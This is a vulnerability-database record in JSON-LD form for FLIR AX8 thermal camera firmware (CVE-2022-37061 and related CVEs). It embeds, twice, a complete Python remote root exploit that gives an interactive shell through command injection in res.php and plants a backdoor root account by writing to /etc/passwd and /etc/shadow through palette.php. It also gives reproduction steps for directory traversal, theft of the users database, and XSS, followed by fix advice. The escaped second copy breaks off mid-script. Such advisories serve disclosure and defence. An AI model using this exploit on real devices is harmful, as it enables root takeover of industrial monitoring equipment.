            "db": "PACKETSTORM",
            "id": "168116"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37063"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3376"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014923"
          },
          {
            "db": "PACKETSTORM",
            "id": "168116"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37063"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3376"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-09-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-014923"
          },
          {
            "date": "2022-08-19T19:24:22",
            "db": "PACKETSTORM",
            "id": "168116"
          },
          {
            "date": "2022-08-18T18:15:08.403000",
            "db": "NVD",
            "id": "CVE-2022-37063"
          },
          {
            "date": "2022-08-18T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202208-3376"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-09-22T08:25:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-014923"
          },
          {
            "date": "2022-10-26T17:01:39.490000",
            "db": "NVD",
            "id": "CVE-2022-37063"
          },
          {
            "date": "2022-08-22T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202208-3376"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3376"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "FLIR\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0flir\u00a0ax8\u00a0 Cross-site scripting vulnerability in firmware",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014923"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3376"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202208-1439

    Vulnerability from variot - Updated: 2023-12-18 11:55

    All FLIR AX8 thermal sensor cameras version up to and including 1.46.16 are vulnerable to Remote Command Injection. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter in the res.php endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges. FLIR Systems, Inc. of flir ax8 The firmware has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. <?php
    2. if (isset($_POST["action"])) {
    3. if(isset($_POST["resource"]))
    6. {
    7. if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) {
    10. break;
    12. }
    13. break;
    15. if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) {
    17. break;
    19. }
    20. break;
    22. default:
    23. }
    25. }

    --------------------------------------------------------------------------------
    /FLIR/usr/www/palette.php:
    --------------------------
    1. <?php
    2. if(isset($_POST["palette"])){
    3. shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/palette ".$_POST["palette"]);
    4. }
    6. ?>

    --------------------------------------------------------------------------------

    Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l)lighttpd/1.4.33PHP/5.4.14. #!/usr/bin/env python

    -- coding: utf-8 --

    FLIR Systems FLIR AX8 Thermal Camera 1.32.16 Remote Root Exploit

    Vendor: FLIR Systems, Inc. The AX8 helps

    you guard against unplanned outages, service interruptions, and equipment

    failure.

    The FLIR AX series camera/sensor also has built-in support to connect to

    industrial control equipment such as programmable logic controllers (PLCs),

    and allows the sharing of analysis and alarm results and simple control

    using the Ethernet/IP and Modbus TCP field bus protocols. Compact and easy

    to install, the AX8 provides continuous monitoring of electrical cabinets,

    process and manufacturing areas, data centers, energy generation and distribution,

    transportation and mass transit, storage facilities and refrigeration warehouses. The issues can be triggered when calling

    multiple unsanitized HTTP GET/POST parameters within the shell_exec function

    in res.php and palette.php file.

    =============================================================================

    /FLIR/usr/www/res.php:

    ----------------------

    1. <?php

    2. if (isset($_POST["action"])) {

    3. switch ($_POST["action"]) {

    4. case "get":

    5. if(isset($_POST["resource"]))

    6. switch ($_POST["resource"]) {

    8. case ".rtp.hflip":

    9. if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) {

    10. $result = "false";

    11. break;

    12. $result = file_get_contents("/FLIR/system/journal.d/horizontal_flip.cfg") === "1" ? "true" : "false";

    14. break;

    15. case ".rtp.vflip":

    16. if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) {

    17. $result = "false";

    18. break;

    19. $result = file_get_contents("/FLIR/system/journal.d/vertical_flip.cfg") === "1" ? "true" : "false";

    21. break;

    22. default:

    23. $result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -o ".$_POST["resource"]));

    24. }

    =============================================================================

    /FLIR/usr/www/palette.php:

    --------------------------

    1. <?php

    2. if(isset($_POST["palette"])){

    3. shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/palette ".$_POST["palette"]);

    4. echo json_encode(array("success"));

    5. ?>

    =============================================================================

    Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l)

    lighttpd/1.4.33

    PHP/5.4.14

    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

    @zeroscience

    Advisory ID: ZSL-2018-5491

    Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5491.php

    26.07.2018

    import requests import colorama import random## import time#### import json#### import sys##### import os######

    piton = os.path.basename(sys.argv[0])

    if len(sys.argv) < 2: print '\n\x20\x20[*] Usage: '+piton+' \n' sys.exit()

    bannah = """ .---------------------------------. | 1984 Pictures | | | | presents | | ___ | | [| |=|{)__ | | |___| \/ ) | | /|\ /| | | / | \ | \ | .---------------------------------. """ print bannah time.sleep(4) os.system('clear')

    print '\nFLIR AX8 Thermal Camera Remote Root Exploit' print 'By Zero Science Lab'

    ICU = ''' `./+ooosoooooo+/.` `.+ss+//:::::::://+ss+.` -oyo/::::-------:::::/oyo- `/yo+:::-------.------:::+oy/` `+yo+::---...........----:/+oy+` `/yo++/--...../+oo+:....---:/+oy/` `ss++//:-.../yhhhhhhy/...-://++ss` .ho++/::--.-yhhddddhhy-.--:://+oh. .ho+//::---/mmmmmmmmmm:---::/++oh. `ss++//::---+mNNNNNNm+---:://++ss` `/yo+//:::----+syys+-----://++oy/` `+yo++//:::-----------:://++oy+` `/yo++///:::::-:::::://+++oy/` .oyo+++////////////+++oyo. `.+ssoo++++++++++ooss+.` `./+osssssssso+/.`
    '''

    colors = list(vars(colorama.Fore).values()) colored_chars = [random.choice(colors) + char for char in ICU]

    print(''.join(colored_chars))

    print print '\x1b[1;37;44m'+'To freeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze on' print '\x1b[1;37;41m'+'To unfreeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze off\n'

    print '[*] Additional commands:' print ' [+] \'addroot\' for add root user.' print ' [+] \'exit\' for exit.\n'

    while True:

    zeTargets = 'http://'+sys.argv[1]+'/res.php'
    zeCommand = raw_input('\x1b[0;96;49m'+'root@neco-0J0X17:~# '+'\x1b[0m')
    zeHeaders = {'Cache-Control'   : 'max-age=0',
                 'User-Agent'      : 'thricer/251.4ev4h',
                 'Accept'          : 'text/html,application/xhtml+xml',
                 'Accept-Encoding' : 'gzip, deflate',
                 'Accept-Language' : 'mk-MK,mk;q=1.7',
                 'Connection'      : 'close',
                 'Connection-Type' : 'application/x-www-form-urlencoded'}
    zePardata = {'action'          : 'get',
                 'resource'        : ';'+zeCommand}
    
    try:
    
        zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)
        print json.loads(zeRequest.text)
    
        if zeCommand.strip() == 'exit':
            sys.exit()
    
        if zeCommand.strip() == 'addroot':
            print '[+] Blind command injection using palette.php...'
            print '[+] Adding user \'roOt\' with password \'rewt\' in shadow file...'
    
            nuTargets = 'http://'+sys.argv[1]+'/palette.php'
            nuHeaders = zeHeaders
    
            nuHexstrn = ('\\x72\\x6f\\x4f\\x74\\x3a\\x24\\x31'
                         '\\x24\\x4d\\x4a\\x4f\\x6e\\x56\\x2f'
                         '\\x59\\x33\\x24\\x74\\x44\\x6e\\x4d'
                         '\\x49\\x42\\x4d\\x79\\x30\\x6c\\x45'
                         '\\x51\\x32\\x6b\\x44\\x70\\x66\\x67'
                         '\\x54\\x4a\\x50\\x30\\x3a\\x31\\x36'
                         '\\x39\\x31\\x34\\x3a\\x30\\x3a\\x39'
                         '\\x39\\x39\\x39\\x39\\x3a\\x37\\x3a'
                         '\\x3a\\x3a\\x0a\\x0d')
    
            nuPadata1 = {'palette' : '1;echo \"roOt:x:0:0:pwn:/sys:/bin/bash\" >> /etc/passwd'}
            nuPadata2 = {'palette' : '1;echo -n -e \"'+nuHexstrn+'\" >> /etc/shadow'}
    
            requests.post(nuTargets, headers=nuHeaders, data=nuPadata1)
            time.sleep(2)
            requests.post(nuTargets, headers=nuHeaders, data=nuPadata2)
    
            print '[*] Success!\n'
        else: pass
    
    except Exception:
        print '[*] Error!'
        break
    

    sys.exit() . # FLIR AX8 vulnerabilities.

    Product description:

    The FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment.

    • [CVE-2022-37060] - Unauthenticated Directory Traversal.

    FLIR AX8 is affected by a directory traversal vulnerability due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains directory traversal characters, to disclose the contents of files located outside of the server's restricted path.

    • [CVE-2022-37062] - Improper Access Control.

    FLIR AX8 is affected by an insecure design vulnerability due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains the path of the SQLite users database, and download it.

    • [CVE-2022-37063] - Reflected cross-site scripting.

    FLIR AX8 is affected by a reflected cross-site scripting (XSS) vulnerability due to an improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface.

    Step by Step Example (How to Reproduce and verify) the vulnerabilities:

    The endpoint /res.php can be called remotely without user authentication as there is no cookie verification Cookie: PHPSESSID=ID to check if the request is legitimate. In the example below we create a crafted query that displays the contents of the /etc/shadow file.

    The server returns a JSON response containing the contents of the /etc/shadow file.

    1. Unauthenticated Directory Traversal.

    The endpoint /download.php can be called remotely without user authentication as there is no cookie verification Cookie: PHPSESSID=ID to check if the request is legitimate. The second problem is that the GET parameter file can be injected with a relative file paths and download any files in the system. In the example below we create a crafted query that download the contents of the /etc/passwd file.

    The error is due to the fact that there is no sanitization of the $file_path variable, line 26, when the fopen() function is called, line 39. However a comment in the code, line 24, and the use of the function pathinfo(), line 28, suggests that the developer thought about this problem and therefore created the variable $path_parts which is sanitized. But for some reasons the developer does not use the sanitizer variable $path_parts when the function fopen() is used. Probably an oversight.

    1. Improper Access Control.

    The endpoint /FLIR/db/users.db can be called remotely without user authentication as there is no cookie verification Cookie: PHPSESSID=ID to check if the request is legitimate and let any malicious actor to download the users.db SQLite database.

    1. Reflected cross-site scripting.

    In the settings tab, if a file with a filename that contains JavaScript code is selected via the update firmware file input the JavaScript code will be triggered and executed. In our example, we created a file call

    .run

    Recommendations for how to fix the 4 vulnerabilities:

    • Vulnerability 1: The variable $_POST["id"], line 65 in the file /FLIR/usr/www/res.php, must be sanitized using the function intval() and will remove any character other than integer value. escapeshellcmd() and escapeshellarg() must be also used to escapes any characters in a string that might be used to execute arbitrary commands.

    More info: https://www.php.net/intval https://www.php.net/manual/en/function.escapeshellcmd https://www.php.net/manual/en/function.escapeshellarg

    • Vulnerability 2: The variable $file_path, line 39 in the file /FLIR/usr/www/download.php, must be sanitized using the function pathinfo() but also use a hard coded directory path, in case you need to manage several directories set a whitelist of all allowed directories and use multiple conditions.

    More info: https://www.php.net/manual/en/function.pathinfo

    • Vulnerability 3: Define a whitelist of all directories that a user is allowed to access. This can be added to the Lighttpd server configuration file, in /etc/lighttpd.conf.

    More info: https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html

    • Vulnerability 4: To protect against filename XSS attack you can use a regex that will parse the filename to leave only numbers and letters.

    More info: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

    Reference:

    https://www.flir.com/products/ax8-automation/

    Security researchers:

    • [Thomas Knudsen] (https://www.linkedin.com/in/thomasjknudsen)
    • [Samy Younsi] (https://www.linkedin.com/in/samy-younsi)

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202208-1439",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ax8",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "flir",
            "version": "1.46.16"
          },
          {
            "model": "ax8",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "flir",
            "version": null
          },
          {
            "model": "ax8",
            "scope": null,
            "trust": 0.8,
            "vendor": "flir",
            "version": null
          },
          {
            "model": "ax8",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "flir",
            "version": "flir ax8  firmware  1.46.16  and earlier"
          },
          {
            "model": "systems flir ax8 thermal camera",
            "scope": "eq",
            "trust": 0.1,
            "vendor": "flir",
            "version": "1.17.13"
          },
          {
            "model": "systems flir ax8 thermal camera",
            "scope": "eq",
            "trust": 0.1,
            "vendor": "flir",
            "version": "os: neco_v1.8-0-g7ffe5b3"
          },
          {
            "model": "systems flir ax8 thermal camera",
            "scope": "eq",
            "trust": 0.1,
            "vendor": "flir",
            "version": "hardware: flir systems neco board"
          }
        ],
        "sources": [
          {
            "db": "ZSL",
            "id": "ZSL-2018-5491"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014925"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37061"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:flir:flir_ax8_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.46.16",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:flir:flir_ax8:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-37061"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Samy Younsi",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3378"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2022-37061",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-37061",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2022-37061",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202208-3378",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "ZSL",
                "id": "ZSL-2018-5491",
                "trust": 0.1,
                "value": "(5/5)"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "ZSL",
            "id": "ZSL-2018-5491"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014925"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37061"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3378"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "All FLIR AX8 thermal sensor cameras version up to and including 1.46.16 are vulnerable to Remote Command Injection. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter in the res.php endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges. FLIR Systems, Inc. of flir ax8 The firmware has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. \u0026lt;?php\u003cbr/\u003e 2.   if (isset($_POST[\"action\"])) {\u003cbr/\u003e 3.         if(isset($_POST[\"resource\"]))\u003cbr/\u003e 6.         {\u003cbr/\u003e 7.               if (!file_exists(\"/FLIR/system/journal.d/horizontal_flip.cfg\")) {\u003cbr/\u003e 10.                break;\u003cbr/\u003e 12.              }\u003cbr/\u003e 13.              break;\u003cbr/\u003e 15.              if (!file_exists(\"/FLIR/system/journal.d/vertical_flip.cfg\")) {\u003cbr/\u003e 17.                break;\u003cbr/\u003e 19.              }\u003cbr/\u003e 20.              break;\u003cbr/\u003e 22.            default:\u003cbr/\u003e 23.          }\u003cbr/\u003e 25.        }\u003cbr/\u003e\u003cbr/\u003e --------------------------------------------------------------------------------\u003cbr/\u003e /FLIR/usr/www/palette.php:\u003cbr/\u003e --------------------------\u003cbr/\u003e 1. \u0026lt;?php\u003cbr/\u003e 2.   if(isset($_POST[\"palette\"])){\u003cbr/\u003e 3.     shell_exec(\"LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/palette \".$_POST[\"palette\"]);\u003cbr/\u003e 4.   }\u003cbr/\u003e 6. ?\u0026gt;\u003cbr/\u003e\u003c/code\u003e\u003cbr/\u003e\t--------------------------------------------------------------------------------\u003cbr/\u003e\u003cbr/\u003eTested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l)lighttpd/1.4.33PHP/5.4.14. #!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# FLIR Systems FLIR AX8 Thermal Camera 1.32.16 Remote Root Exploit\n#\n#\n# Vendor: FLIR Systems, Inc. The AX8 helps\n# you guard against unplanned outages, service interruptions, and equipment\n# failure. \n#\n# The FLIR AX series camera/sensor also has built-in support to connect to\n# industrial control equipment such as programmable logic controllers (PLCs),\n# and allows the sharing of analysis and alarm results and simple control\n# using the Ethernet/IP and Modbus TCP field bus protocols. Compact and easy\n# to install, the AX8 provides continuous monitoring of electrical cabinets,\n# process and manufacturing areas, data centers, energy generation and distribution,\n# transportation and mass transit, storage facilities and refrigeration warehouses. The issues can be triggered when calling\n# multiple unsanitized HTTP GET/POST parameters within the shell_exec function\n# in res.php and palette.php file. \n#\n# =============================================================================\n# /FLIR/usr/www/res.php:\n# ----------------------\n# 1. \u003c?php\n# 2.   if (isset($_POST[\"action\"])) {\n# 3.     switch ($_POST[\"action\"]) {\n# 4.       case \"get\":\n# 5.         if(isset($_POST[\"resource\"]))\n# 6.           switch ($_POST[\"resource\"]) {\n# 8.             case \".rtp.hflip\":\n# 9.               if (!file_exists(\"/FLIR/system/journal.d/horizontal_flip.cfg\")) {\n# 10.                $result = \"false\";\n# 11.                break;\n# 12.              $result = file_get_contents(\"/FLIR/system/journal.d/horizontal_flip.cfg\") === \"1\" ? \"true\" : \"false\";\n# 14.              break;\n# 15.            case \".rtp.vflip\":\n# 16.              if (!file_exists(\"/FLIR/system/journal.d/vertical_flip.cfg\")) {\n# 17.                $result = \"false\";\n# 18.                break;\n# 19.              $result = file_get_contents(\"/FLIR/system/journal.d/vertical_flip.cfg\") === \"1\" ? \"true\" : \"false\";\n# 21.              break;\n# 22.            default:\n# 23.              $result = trim(shell_exec(\"LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -o \".$_POST[\"resource\"]));\n# 24.        }\n#\n# =============================================================================\n# /FLIR/usr/www/palette.php:\n# --------------------------\n# 1. \u003c?php\n# 2.   if(isset($_POST[\"palette\"])){\n# 3.     shell_exec(\"LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/palette \".$_POST[\"palette\"]);\n# 4.     echo json_encode(array(\"success\"));\n# 5. ?\u003e\n#\n# =============================================================================\n#\n#\n# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l)\n#            lighttpd/1.4.33\n#            PHP/5.4.14\n#\n#\n# Vulnerability discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n#                             @zeroscience\n#\n#\n# Advisory ID: ZSL-2018-5491\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5491.php\n#\n#\n# 26.07.2018\n#\n\nimport requests\nimport colorama\nimport random##\nimport time####\nimport json####\nimport sys#####\nimport os######\n\npiton = os.path.basename(sys.argv[0])\n\nif len(sys.argv) \u003c 2:\n    print \u0027\\n\\x20\\x20[*] Usage: \u0027+piton+\u0027 \u003cip:port\u003e\\n\u0027\n    sys.exit()\n\nbannah = \"\"\"\n.---------------------------------. \n|         1984 Pictures           |\n|                                 |\n|            presents             |\n|                  ___            |\n|                [|   |=|{)__     |\n|                 |___| \\/   )    |\n|                  /|\\      /|    |\n|                 / | \\     | \\\\   |\n.---------------------------------. \n\"\"\"\nprint bannah\ntime.sleep(4)\nos.system(\u0027clear\u0027)\n\nprint \u0027\\nFLIR AX8 Thermal Camera Remote Root Exploit\u0027\nprint \u0027By Zero Science Lab\u0027\n\nICU = \u0027\u0027\u0027\n                ````````                \n           `./+ooosoooooo+/.`           \n        `.+ss+//:::::::://+ss+.`        \n       -oyo/::::-------:::::/oyo-       \n     `/yo+:::-------.------:::+oy/`     \n    `+yo+::---...........----:/+oy+`    \n   `/yo++/--...../+oo+:....---:/+oy/`   \n   `ss++//:-.../yhhhhhhy/...-://++ss`   \n   .ho++/::--.-yhhddddhhy-.--:://+oh.   \n   .ho+//::---/mmmmmmmmmm:---::/++oh.   \n   `ss++//::---+mNNNNNNm+---:://++ss`   \n   `/yo+//:::----+syys+-----://++oy/`   \n    `+yo++//:::-----------:://++oy+`    \n     `/yo++///:::::-:::::://+++oy/`     \n       .oyo+++////////////+++oyo.       \n        `.+ssoo++++++++++ooss+.`        \n           `./+osssssssso+/.`           \n                ````````                \n\u0027\u0027\u0027\n\ncolors = list(vars(colorama.Fore).values())\ncolored_chars = [random.choice(colors) + char for char in ICU]\n\nprint(\u0027\u0027.join(colored_chars))\n\nprint\nprint \u0027\\x1b[1;37;44m\u0027+\u0027To freeze the stream run:   \u0027+\u0027\\x1b[0m\u0027+\u0027 /FLIR/usr/bin/freeze on\u0027\nprint \u0027\\x1b[1;37;41m\u0027+\u0027To unfreeze the stream run: \u0027+\u0027\\x1b[0m\u0027+\u0027 /FLIR/usr/bin/freeze off\\n\u0027\n\nprint \u0027[*] Additional commands:\u0027\nprint \u0027 [+] \\\u0027addroot\\\u0027 for add root user.\u0027\nprint \u0027 [+] \\\u0027exit\\\u0027 for exit.\\n\u0027\n\nwhile True:\n\n    zeTargets = \u0027http://\u0027+sys.argv[1]+\u0027/res.php\u0027\n    zeCommand = raw_input(\u0027\\x1b[0;96;49m\u0027+\u0027root@neco-0J0X17:~# \u0027+\u0027\\x1b[0m\u0027)\n    zeHeaders = {\u0027Cache-Control\u0027   : \u0027max-age=0\u0027,\n                 \u0027User-Agent\u0027      : \u0027thricer/251.4ev4h\u0027,\n                 \u0027Accept\u0027          : \u0027text/html,application/xhtml+xml\u0027,\n                 \u0027Accept-Encoding\u0027 : \u0027gzip, deflate\u0027,\n                 \u0027Accept-Language\u0027 : \u0027mk-MK,mk;q=1.7\u0027,\n                 \u0027Connection\u0027      : \u0027close\u0027,\n                 \u0027Connection-Type\u0027 : \u0027application/x-www-form-urlencoded\u0027}\n    zePardata = {\u0027action\u0027          : \u0027get\u0027,\n                 \u0027resource\u0027        : \u0027;\u0027+zeCommand}\n\n    try:\n\n        zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)\n        print json.loads(zeRequest.text)\n\n        if zeCommand.strip() == \u0027exit\u0027:\n            sys.exit()\n\n        if zeCommand.strip() == \u0027addroot\u0027:\n            print \u0027[+] Blind command injection using palette.php...\u0027\n            print \u0027[+] Adding user \\\u0027roOt\\\u0027 with password \\\u0027rewt\\\u0027 in shadow file...\u0027\n\n            nuTargets = \u0027http://\u0027+sys.argv[1]+\u0027/palette.php\u0027\n            nuHeaders = zeHeaders\n\n            nuHexstrn = (\u0027\\\\x72\\\\x6f\\\\x4f\\\\x74\\\\x3a\\\\x24\\\\x31\u0027\n                         \u0027\\\\x24\\\\x4d\\\\x4a\\\\x4f\\\\x6e\\\\x56\\\\x2f\u0027\n                         \u0027\\\\x59\\\\x33\\\\x24\\\\x74\\\\x44\\\\x6e\\\\x4d\u0027\n                         \u0027\\\\x49\\\\x42\\\\x4d\\\\x79\\\\x30\\\\x6c\\\\x45\u0027\n                         \u0027\\\\x51\\\\x32\\\\x6b\\\\x44\\\\x70\\\\x66\\\\x67\u0027\n                         \u0027\\\\x54\\\\x4a\\\\x50\\\\x30\\\\x3a\\\\x31\\\\x36\u0027\n                         